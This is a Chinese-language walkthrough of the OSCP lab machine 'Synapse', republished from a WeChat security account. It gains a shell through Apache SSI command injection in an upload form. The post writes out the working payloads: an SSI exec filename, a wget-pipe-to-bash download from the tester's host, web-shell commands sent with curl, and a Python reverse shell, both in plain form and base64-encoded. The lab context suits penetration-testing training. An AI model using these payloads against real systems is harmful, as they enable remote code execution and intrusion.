[OSCP官方靶机系列]-Hard-Synapse

admin 2022年6月11日03:04:04评论61 views字数 2276阅读7分35秒阅读模式

STATEMENT

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

前言

OSCP官靶[Synapse]难易指数:Hard

OSCP的web部分通常思路为以下几种:

  1. 直接找Exploit或改Exploit就可以得到shell

  2. 爆破路径发现指纹(泄露文件),根据指纹进行下一步操作

  3. Fuzz参数,尝试文件包含漏洞

Synapse靶机并不是以上几种思路,并且在网上没有wp,看我如何拿下它。



信息收集

进行端口扫描,查看是否存在非top1000端口的其他服务。

sudo nmap -Pn -T4 -p 1-65535 192.168.57.149
[OSCP官方靶机系列]-Hard-Synapse

发现Web服务,暂无其他端口

[OSCP官方靶机系列]-Hard-Synapse

Web探测

web是静态页面,也没有其他可以利用的地方,我就开始尝试路径爆破。

python3 dirsearch.py -u "http://192.168.57.149/" -e all
[OSCP官方靶机系列]-Hard-Synapse

扫描结果好像有点东西爆出来了,不过经过访问,无果。我再进一步扫描看看。利用DirBuster进行爆破,这里我选择"/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt"字典跑了下。

[OSCP官方靶机系列]-Hard-Synapse

结果发现elFinder(WEB文件管理)我尝试打了下poc,结果不行。很多人可能觉得就是这个漏洞了,但OSCP的靶机存在很多应用是没有漏洞的,这个时候你需要换思路。

而我根据经验,查看html源码,找到php文件。打开后是一个编辑器,这里没有截那个编辑器的图,因为它就一个文件上传的功能其他啥也没有。点击文件上传,进行抓包。

[OSCP官方靶机系列]-Hard-Synapse

发现改后缀无果,似乎没有其他思路了。我发现返回值居然带有"shtml"的一个URL,同时返回页面里含有上传的文件名。

当机立断猜测是"Apache SSI 远程命令执行漏洞",payload如下。

<!--# exec cmd='id'-->.jpg
[OSCP官方靶机系列]-Hard-Synapse

返回结果

[OSCP官方靶机系列]-Hard-Synapse

经过大量fuzz后,找到了写shell的目录("UploadF1les3nd1ma4G3s"),bash命令无法直接写入,因为长度太长,这个时候可以利用wget进行下载并执行bash脚本,从而创建php文件。

写Shell

创建index.html文件,在index.html中写入bash脚本,当访问后执行脚本就会生成php文件到指定文件夹内。

echo '' > UploadF1les3nd1ma4G3s/alphabug.php

开启一个web服务

sudo python3 -m http.server 80
[OSCP官方靶机系列]-Hard-Synapse
<!--# exec cmd='wget -O - 192.168.57.200 | bash'-->.jpg
[OSCP官方靶机系列]-Hard-Synapse

跳转

[OSCP官方靶机系列]-Hard-Synapse

成功getshell

[OSCP官方靶机系列]-Hard-Synapse
[OSCP官方靶机系列]-Hard-Synapse

获取Flag

然后利用命令直接拿到local.txt文件

curl http://192.168.57.149/UploadF1les3nd1ma4G3s/alphabug.php -X POST -d "1=cat /home/mindsflee/local.txt;id;ifconfig"
[OSCP官方靶机系列]-Hard-Synapse
[OSCP官方靶机系列]-Hard-Synapse

浅弹Shell

因为时间关系,没有进行提权,但做了反弹shell测试。

bash、sh、zsh等常规弹shell都不行,服务器存在python,可以利用python进行弹交互式shell,从而进行提权。

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.57.200",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(/bin/bash")'

但需要bash64加密下,否则会有些小问题。执行的时候,解码后执行即可。

curl http://192.168.57.149/UploadF1les3nd1ma4G3s/alphabug.php -X POST -d "1=echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC41Ny4yMDAiLDEyMzQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL2Jhc2giKScK | base64 -d | bash"


安恒信息

杭州亚运会网络安全服务官方合作伙伴

成都大运会网络信息安全类官方赞助商

武汉军运会、北京一带一路峰会

青岛上合峰会、上海进博会

厦门金砖峰会、G20杭州峰会

支撑单位北京奥运会等近百场国家级

重大活动网络安保支撑单位

[OSCP官方靶机系列]-Hard-Synapse


END

[OSCP官方靶机系列]-Hard-Synapse
[OSCP官方靶机系列]-Hard-Synapse
[OSCP官方靶机系列]-Hard-Synapse

长按识别二维码关注我们


原文始发于微信公众号(雷神众测):[OSCP官方靶机系列]-Hard-Synapse

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月11日03:04:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [OSCP官方靶机系列]-Hard-Synapsehttp://cn-sec.com/archives/1106427.html

发表评论

匿名网友 填写信息